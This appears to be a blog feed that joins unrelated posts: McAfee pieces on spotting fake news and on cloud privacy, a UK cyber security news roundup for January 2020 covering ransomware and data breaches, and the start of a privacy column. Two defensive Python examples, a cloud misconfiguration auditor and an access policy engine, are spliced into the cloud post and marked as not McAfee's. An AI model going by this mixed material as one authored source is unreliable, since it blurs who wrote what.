The post U.S. Battleground County Website Security Survey appeared first on McAfee Blogs.

Spotting Fake News: Teaching Kids to be Responsible Online Publishers

fake news

Editor’s note: This is part II in a series on Fake News. Read part I, here.

Kids today are not equipped to deal with the barrage of digital information coming at them every day. Add to that the bulk of information that may be fake, misleading, or even malicious. So how do we help kids become more responsible for the content they share online?

We do it one conversation at a time.

When it comes to the mounting influence of fake news, it’s easy to point the finger at the media, special interest groups, politicians, and anyone else with an agenda and internet access. While many of these groups may add to the problem, each one of us plays a role in stopping it.

What’s our role?

We, the connected consumer, now play such a significant role in how content is created and disseminated, that a large part of the solution comes down to individual responsibility — yours and mine.

The shift begins with holding ourselves accountable for every piece of content we read, create, or share online. That shift gains momentum when we equip our kids to do the same.

Teach personal responsibility. Start the conversation around personal responsibility early with your kids and keep it going. Explain that every time we share fake news, a rumor, or poorly sourced material, we become one cog in the wheel of spreading untruths and even malicious fabrications. We become part of the problem. Challenge your child to become a trustworthy, discerning source of information as opposed to being viewed by others as an impulsive, unreliable source.

Discuss the big picture. Fake news or misleading content isn’t just annoying; it’s harmful in a lot of other ways. Misinformation undermines trust, causes division, can spark social unrest, and harms unity. More than that, fake news edges out helpful, factual content designed to educate and inform.

Be aware of confirmation bias. Confirmation bias is gravitating toward ideas, people, and content that echoes our spiritual, social, political, or moral points of view. Confirmation bias tempts us to disregard information that opposes our ideology. While confirmation bias is part of our human nature, left unchecked, it can be an obstacle to learning factual information.

Chill, don’t spill. Fake news is designed to advance a personal agenda. This is especially true during times of social tension when tempers are running high. Don’t take the emotional bait. Exercise discernment. Before sharing, read legitimate news sources that offer balanced coverage, so the story you share or opinion you express is based on accurate information.

Be a free thinker. Our kids have grown up in a world where ‘like’ and ‘share’ counts somehow equate to credibility. Encourage kids to break away from the crowd and have the courage to be free, independent thinkers.

Challenge content by asking:

  • Do I understand all the points of view of this story?
  • What do I really think about this topic or idea?
  • Am I overly emotional and eager to share this?
  • Am I being manipulated by this content?
  • What if I’m wrong?

Question every source. Studies show that people assume that the higher something ranks in search results, the more factual or trustworthy the information is. Wrong. Algorithms retrieve top content based on keywords, not accuracy. So, dig deeper and verify sources.

5 ways to spot fake news

1. Look closely at the source. Fake news creators are good at what they do. While some content has detectable errors, others are sophisticated and strangely persuasive. So, take a closer look. Test credibility by asking:

  • Where is the information coming from?
  • Is this piece satire?
  • Are the author of the article, the bio, and the website legitimate?
  • Are studies, infographics, and quotes appropriately attributed?
  • Is the URL legitimate (cnn.com vs. cnn.com.co)?
  • Are there red flags such as an unknown author, all capital letters, misspellings, or grammar errors?

2. Be discerning with viral content. Often a story will go viral because it’s so unbelievable. So pause before you share. Google the story’s headline to see if the story appears in other reliable publications.

3. Pay attention to publish dates and context. Some viral news items may not be entirely false, just intentionally shared out of context. Fake news creators often pull headlines or stories from the past and present them as current news to fit the desired narrative.

4. Beware of click-bait headlines. A lot of fake news is carefully designed with user behavior in mind. A juicy headline leads to a false news story packed with even more fake links that take you to a product page or, worse, download malware onto your computer, putting your data and privacy at risk. These kinds of fake news scams capitalize on emotional stories such as the recent tragic death of basketball great Kobe Bryant.

5. Verify information. It takes extra effort, but plenty of sites exist that can help you verify a piece of information. Before sharing a piece of content, check it out on sites like:

  • Snopes.com
  • Factcheck.com
  • Politifact.org
  • Opensecrets.org
  • Truthorfiction.com
  • Hoaxslayer.com

While fake news isn’t a new phenomenon, thanks to technology’s amplification power, it’s reached new levels of influence and deception. This social shift makes it imperative to get in front of this family conversation as soon as possible, especially since we’re headed into an election year.

The post Spotting Fake News: Teaching Kids to be Responsible Online Publishers appeared first on McAfee Blogs.

Top 10 Cloud Privacy Recommendations for Businesses

In the corporate world, privacy refers to employee/business data as well as customer/supplier data—you must safeguard both of them. Laws such as CCPA and GDPR, not to mention vertical market regulations, make it clear how important this issue is to regulators, who take into account the security tools in use and their settings during investigations. (Fines can be significantly lower if tools are well deployed.)

As businesses continue to accelerate to the cloud, there’s no better time to review all aspects of cloud data collection, use, storage, transfer and processing.

  1. Investigate shadow IT, unsanctioned cloud providers and THEIR security

The organization’s data can easily leak via shadow cloud services; for example, users converting a PDF of the employee phone list, translating a project plan, or using a cloud-based presentation tool or unmanaged collaboration services. The corporation is responsible for data loss from its employees, no matter how it occurs. So IT needs visibility into all cloud services, even those set up by individual users or small groups. Once you have a comprehensive picture of unsanctioned cloud usage, this information should be shared with the purchasing team to help them decide which services to approve.

  2. Integrate with global SSO

Global single sign-on services can ensure that users’ access is removed from all services when they leave the organization, as well as reduce the risk of data loss from password reuse. In a non-SSO service, users often call the helpdesk team when they’ve forgotten their passwords, so SSO has the added benefit of reducing call volume.

  3. Work with GRC and workshop how users use cloud

GRC (governance, risk and compliance) should be brought in to help define cloud use policies. Often, they are unsure how clouds are being used and what data is being uploaded, and therefore policies are general. Create a team including users, GRC and IT security to define policies for the real world by reviewing the possible actions that can be taken in each particular cloud service and ensure policies are defined for all eventualities.

  4. Review IaaS – Don’t assume DevOps did everything right

The fastest-growing area of cloud is IaaS—AWS, Azure and Google Cloud Platform. Here, it is very easy for developers to misconfigure the settings and leave data open to attackers. Technology is needed to check for all IaaS services (we always find more than people believe they have) and their settings—ideally, this would be a system that can automatically change settings to secure options.
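What "check the settings and change them to secure options" looks like in practice, as an added example that is not McAfee's product or code: a small audit over a constructed IaaS inventory (storage buckets and firewall rules, shaped loosely like what a cloud API returns, but entirely hypothetical) that reports each risky setting together with the secure value, and a remediation step that writes those values back. The inventory, the list of admin ports and the internal address range are assumptions.

```python
"""Audit a constructed IaaS inventory for settings that leave data open, and
apply the secure setting for each finding.

Added example; the inventory is hypothetical and not from any real account.
"""
import copy
from dataclasses import dataclass
from typing import Any, Dict, List

# Constructed inventory (hypothetical).  One bucket is deliberately public so
# the audit has to tell intended exposure from accidental exposure.
INVENTORY: Dict[str, List[Dict[str, Any]]] = {
    "buckets": [
        {"name": "hr-exports", "public_read": True, "encryption": None,
         "access_logging": False, "intended_public": False},
        {"name": "www-assets", "public_read": True, "encryption": "AES256",
         "access_logging": True, "intended_public": True},
        {"name": "backups", "public_read": False, "encryption": "kms",
         "access_logging": True, "intended_public": False},
    ],
    "security_groups": [
        {"name": "db-sg", "ingress": [{"port": 5432, "cidr": "0.0.0.0/0"}]},
        {"name": "web-sg", "ingress": [{"port": 443, "cidr": "0.0.0.0/0"}]},
    ],
}

# Management and database ports that should never face the whole internet.
ADMIN_PORTS = {22, 3389, 1433, 3306, 5432, 6379, 9200, 27017}
ANY_CIDR = {"0.0.0.0/0", "::/0"}
INTERNAL_CIDR = "10.0.0.0/8"   # hypothetical corporate range used as the safe value


@dataclass
class Finding:
    kind: str             # "bucket" or "security_group"
    resource: str
    issue: str
    fix: Dict[str, Any]   # the setting to write back


def audit_buckets(buckets: List[Dict[str, Any]]) -> List[Finding]:
    out: List[Finding] = []
    for b in buckets:
        if b.get("public_read") and not b.get("intended_public"):
            out.append(Finding("bucket", b["name"],
                               "public read on non-public data", {"public_read": False}))
        if not b.get("encryption"):
            out.append(Finding("bucket", b["name"],
                               "encryption at rest disabled", {"encryption": "kms"}))
        if not b.get("access_logging"):
            out.append(Finding("bucket", b["name"],
                               "access logging disabled", {"access_logging": True}))
    return out


def audit_security_groups(groups: List[Dict[str, Any]]) -> List[Finding]:
    out: List[Finding] = []
    for g in groups:
        for rule in g.get("ingress", []):
            if rule["cidr"] in ANY_CIDR and rule["port"] in ADMIN_PORTS:
                out.append(Finding("security_group", g["name"],
                                   "port %d open to the internet" % rule["port"],
                                   {"port": rule["port"], "cidr": INTERNAL_CIDR}))
    return out


def audit(inventory: Dict[str, List[Dict[str, Any]]]) -> List[Finding]:
    return audit_buckets(inventory["buckets"]) + audit_security_groups(inventory["security_groups"])


def apply_fixes(inventory: Dict[str, Any], findings: List[Finding]) -> Dict[str, Any]:
    """Return a copy of the inventory with every finding's fix applied."""
    fixed = copy.deepcopy(inventory)
    by_name = {"bucket": {b["name"]: b for b in fixed["buckets"]},
               "security_group": {g["name"]: g for g in fixed["security_groups"]}}
    for f in findings:
        target = by_name[f.kind][f.resource]
        if f.kind == "bucket":
            target.update(f.fix)
        else:  # narrow only the offending world-open rule, leave the rest alone
            for rule in target["ingress"]:
                if rule["port"] == f.fix["port"] and rule["cidr"] in ANY_CIDR:
                    rule["cidr"] = f.fix["cidr"]
    return fixed


if __name__ == "__main__":
    findings = audit(INVENTORY)
    for f in findings:
        print("%s %s: %s -> %s" % (f.kind, f.resource, f.issue, f.fix))
    print("after remediation:", audit(apply_fixes(INVENTORY, findings)))
```

The "intended_public" flag is the part real deployments get wrong in both directions: without it, an auto-remediator will take a public website's asset bucket offline, and without the audit, the HR export bucket stays readable by anyone. Keep the intent as an explicit, reviewed attribute rather than guessing from the bucket name.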

  5. Keep up to date with technology—serverless, containers, cloud email services, etc.

The cloud includes many technologies that are constantly evolving; therefore, security needs to change too. Developers are often at the forefront of technological advances—bringing in code from GitHub, running container systems that only live for a few minutes (even this isn’t too short a time to require safeguarding) and more. IT security needs to be in partnership with the development teams and deploy technologies to defend against the latest threats.

  6. Integrate with web gateway and DLP—don’t lose security as you move to cloud

After investing time and money over the last decade on security, you don’t want to lose that investment when moving to the cloud. As systems and data are moved skyward, you should deploy technologies that can integrate with your existing services and technology. For example, you shouldn’t have two different DLP models depending on the computing services used by your employees. Deploy systems that can integrate with each other, preferably with a single-pane-of-glass management system.

  7. Don’t assume CSPs will keep your logs forever

If the worst happens, you need to investigate the history of a data loss incident. CSPs will rarely save data logs forever—refer to your contract to find out how long they keep logs, and consider having your own logs so that forensic investigations can be executed even if the original data loss incident was some time ago.

  8. Consider differential policies based on location, device, etc.

Once data is in the cloud, the whole idea is to facilitate global working. Is that always appropriate? For example, what if an employee wants to download a sensitive corporate document via a cloud service to an unmanaged device? Consider the situations your employees will encounter, and form policy that provides the maximum amount of security required while causing the least amount of disruption possible.
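The unmanaged-device download in the paragraph above is one row of a policy table. The following added example (not a vendor's policy engine, and not code from the McAfee post) writes that table as ordered rules over the request context: data classification, action, whether the device is managed, the client's country and whether the session completed MFA. Restrictive rules come first so that a deny or a step-up always wins over the final "allow". The classifications, the approved-country list and the rules themselves are constructed for illustration.

```python
"""Context-aware access decisions for cloud-held data.

Added example of the "differential policy" idea; the rule set, classifications
and approved countries are hypothetical.
"""
from dataclasses import dataclass

# Approved working locations (constructed list, ISO country codes).
ALLOWED_COUNTRIES = {"GB", "US", "DE"}
SENSITIVITY = {"public": 0, "internal": 1, "confidential": 2}


@dataclass(frozen=True)
class Request:
    user: str
    action: str           # "view", "download" or "share_external"
    classification: str   # key of SENSITIVITY
    managed_device: bool  # device enrolled in corporate management
    country: str          # where the client connects from
    mfa: bool             # session completed multi-factor authentication


@dataclass(frozen=True)
class Decision:
    effect: str   # "allow", "deny" or "step_up" (ask for MFA, then retry)
    reason: str


def evaluate(req: Request) -> Decision:
    """Ordered rules: the first matching rule decides."""
    level = SENSITIVITY[req.classification]

    # Rule 1: confidential data never leaves via self-service external sharing.
    if req.action == "share_external" and level >= 2:
        return Decision("deny", "confidential data cannot be shared externally")

    # Rule 2: anything above public may be downloaded only to a managed device;
    # the user can still view it in the browser, which keeps the copy server-side.
    if req.action == "download" and level >= 1 and not req.managed_device:
        return Decision("deny", "download of %s data blocked on unmanaged device; "
                                "view in the browser instead" % req.classification)

    # Rule 3: confidential data always needs MFA, and outside approved countries
    # it can only be viewed, not downloaded or shared.
    if level >= 2:
        if req.country not in ALLOWED_COUNTRIES and req.action != "view":
            return Decision("deny", "only viewing confidential data is permitted from %s"
                            % req.country)
        if not req.mfa:
            return Decision("step_up", "MFA required for confidential data")

    # Rule 4: the point of the cloud is to let people work anywhere.
    return Decision("allow", "no restrictive rule matched")


if __name__ == "__main__":
    # Constructed requests, including the unmanaged-device download from the text.
    samples = [
        Request("alice", "download", "confidential", managed_device=False, country="GB", mfa=True),
        Request("alice", "view", "confidential", managed_device=False, country="GB", mfa=True),
        Request("bob", "download", "confidential", managed_device=True, country="FR", mfa=True),
        Request("carol", "view", "confidential", managed_device=True, country="GB", mfa=False),
        Request("dave", "share_external", "public", managed_device=False, country="FR", mfa=False),
    ]
    for r in samples:
        d = evaluate(r)
        print("%-6s %-14s %-12s -> %-7s %s" % (r.user, r.action, r.classification, d.effect, d.reason))
```

Two design points: a "step_up" outcome lets the service ask for MFA instead of failing the user outright, which is the "least disruption" the text asks for, and the reason string is returned so the user sees why a download was refused and what still works, which cuts the helpdesk calls that blanket blocks generate.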

  9. Promote the clouds you DO like to your users

Carrots work better than sticks to train users. Don’t just block the services you don’t like, promote widely the cloud services you approve of, those that conform to your security needs, your performance indicators and capabilities. Promote them via the intranet, blogs and internal marketing, and redirect requests to unsupported services back to those you like.

  10. Privacy and security is everyone’s responsibility: Bring in other departments and users

Perhaps the last recommendation should be the first: Use every method available to train users, but before you do, work with those users and their representatives to define appropriate policies. The aim is to encourage users to use cloud services that are not only safe, but will allow them to be as productive as possible. The users themselves typically have great ideas of the services they’d like to use, why and how, so bring them in to help define the policies and work together with GRC.

Here’s to successful and secure cloud deployment, and to keeping your users and customer personal data as secure as you can in 2020 and beyond.

For more information, take a look at our additional resource on safeguarding your personal data in the cloud.

The post Top 10 Cloud Privacy Recommendations for Businesses appeared first on McAfee Blogs.

Cyber Security Roundup for February 2020

A roundup of UK focused cyber and information security news stories, blog posts, reports and threat intelligence from the previous calendar month, January 2020.

After years of dither and delay the UK government finally nailed its colours to the mast, no, not on Brexit but on Huawei, permitting 'limited use' of the Chinese telecoms giant's network appliances within the UK's new 5G infrastructure. Whether this is a good decision depends more on individual political persuasion than national security interest, so just like Brexit the general view on the decision is binary: either it's a clever compromise or a complete sell-out of UK national security. I personally believe the decision is more about national economics than national security, as I previously blogged in 'The UK Government Huawei Dilemma and the Brexit Factor'. The UK government is playing a delicate balancing act to safeguard potentially massive trade deals with both of the world's largest economic superpowers, China and the United States. An outright US-style ban on Huawei would seriously jeopardise billions of pounds worth of Chinese investment in the UK economy. On the security front, Huawei's role will be restricted to protect the UK's critical national infrastructure, with Huawei's equipment banned from use within the core of the 5G infrastructure. The UK National Cyber Security Centre (NCSC) published a document which provides guidance to high-risk network providers on the use of Huawei tech.
UK Gov agrees to 'limited' Huawei involvement within UK 5G

Ransomware targeting UK businesses continues to rear its ugly head in 2020; this time the operations of global foreign exchange firm Travelex were brought to a shuddering halt after a major ransomware attack took down Travelex's IT systems. Travelex services impacted included its UK business, international websites, mobile apps, and white-labelled services for the likes of Tesco, Sainsburys, Virgin Money, Barclays and RBS. The ransomware in question was named as Sodinokibi, with numerous media reports strongly suggesting the Sodinokibi ransomware infiltrated the Travelex network through unpatched vulnerable Pulse Secure VPN servers, which the National Cyber Security Centre had apparently detected and warned Travelex about many months earlier. There could be some truth in this, given the Sodinokibi ransomware is known to infect through remote access systems, including vulnerable Pulse Secure VPN servers. The cybercriminal group behind the attack, also known as Sodin and REvil, demanded £4.6 million in ransom payment, and also claimed to have taken 5Gb of Travelex customer data. Travelex reported no customer data had been breached; however, its money exchange services remained offline for well over two weeks after reporting the incident, with the firm advising it expected most of its travel exchange services to be back operational by the end of January.

The same Sodinokibi criminal group behind the Travelex attack also claimed responsibility for what German automotive parts supplier Gedia Automotive Group described as a 'massive cyber attack'. Gedia said it would take weeks to months before its IT systems were up and running as normal. According to analysis by US cyber security firm Bad Packets, the German firm also had an unpatched Pulse Secure VPN server on its network perimeter which left it exposed to the ransomware attack. Gedia patched its VPN server on 4th January.

Leeds-based medical tech company Tissue Regenix halted its US manufacturing operation after an unauthorised party accessed its IT systems. To date there haven't been any details about the nature of this cyber attack, but a manufacturing shutdown is a hallmark of a mass ransomware infection. Reuters reported shares in the company dropped 22% following its cyber attack disclosure.

London-based marine consultancy company LOC was hacked and held to ransom by cybercriminals. It was reported computers were 'locked' and 300Gb of company data was stolen by a criminal group; investigations into this hack are still ongoing.

It seems every month I report a massive data breach due to the misconfiguration of a cloud server, but I never expected one of the leading global cloud providers, Microsoft, to be caught out by such a schoolboy error. Microsoft reported a database misconfiguration of its Elasticsearch servers exposed 250 million customer support records between 5th and 19th December 2019. Some of the non-redacted data exposed included customer email addresses; IP addresses; locations; descriptions of customer support claims and cases; Microsoft support agent emails; case numbers, resolutions and remarks; and confidential internal notes. It is not known if any unauthorised parties had accessed any of the leaked data.

Cyber attacks against the UK defence industry hit unprecedented highs according to government documentation obtained by Sky News. Sky News revealed the MoD and its partners failed to protect military and defence data in 37 incidents in 2017 and 34 incidents in the first 10 months of 2018, with military data exposed to nation-level cyber actors on dozens of occasions.

It was another fairly busy month for Microsoft patches, including an NSA-revealed critical flaw in Windows 10. January also saw the end of security update support for Windows 7 and Windows Server 2008, unless you pay Microsoft extra for extended support.

According to a World Economic Forum (WEF) study, most of the world's airports' cybersecurity is not up to scratch. WEF reported 97 of the world’s 100 largest airports have vulnerable web and mobile applications, misconfigured public cloud and dark web leaks. The findings in summary were:

  • 97% of the websites contain outdated web software.
  • 24% of the websites contain known and exploitable vulnerabilities.
  • 76% and 73% of the websites are not compliant with GDPR and PCI DSS, respectively.
  • 100% of the mobile apps contain at least five external software frameworks.
  • 100% of the mobile apps contain at least two vulnerabilities.

Elsewhere in the world, it was reported a US Department of Defense contractor had its web servers (and thus its websites) taken down by the Ryuk ransomware. Houston-based steakhouse Landry's advised it was hit by a point-of-sale malware attack which stole customer payment card data. Stolen customer payment card data taken from a Pennsylvania-based convenience store and petrol station operator was found for sale online. Ahead of Super Bowl LIV, Twitter and Facebook accounts for 15 NFL teams were hacked. The hacking group OurMine took responsibility for the NFL franchise attacks, saying it was to demonstrate internet security was "still low" and had to be improved upon. Sonos apologised after accidentally revealing hundreds of customer email addresses to each other. And ransomware took a US maritime base offline for 30 hours.

Dallas County Attorney finally applied some common sense, dropping charges against two Coalfire red teamers. The two Coalfire employees had been arrested on 11th September 2019 while conducting a physical penetration test of the Dallas County courthouse. The Perry News quoted a police report which said upon arrest the two men stated, "they were contracted to break into the building for Iowa courts to check the security of the building". After the charges were dropped at the end of January, Coalfire CEO Tom McAndrew said, "With positive lessons learned, a new dialogue now begins with a focus on improving best practices and elevating the alignment between security professionals and law enforcement", adding, "We’re grateful to the global security community for their support throughout this experience."


Will we just accept our loss of privacy, or has the techlash already begun? | Alan Rusbridger

Not so long ago we searched Google. Now we seem quite happy to let Google search us

Probably too late to ask, but was the past year the moment we lost our technological innocence? The Alexa in the corner of the kitchen monitoring your every word? The location-betraying device in your pocket? The dozen trackers on that web page you just opened? The thought that a 5G network could, in some hazily understood way, be hardwired back to Beijing? The spooky use of live facial recognition on CCTV cameras across London.

With privacy there have been so many landmarks in the past 12 months. The $5bn Federal Trade Commission fine on Facebook to settle the Cambridge Analytica scandal? The accidental exposure of a mind-blowing 1.2 billion people’s details from two data enrichment companies? Up to 50m medical records spilled?

We gleefully carry surveillance machines in our pockets and install them in our homes
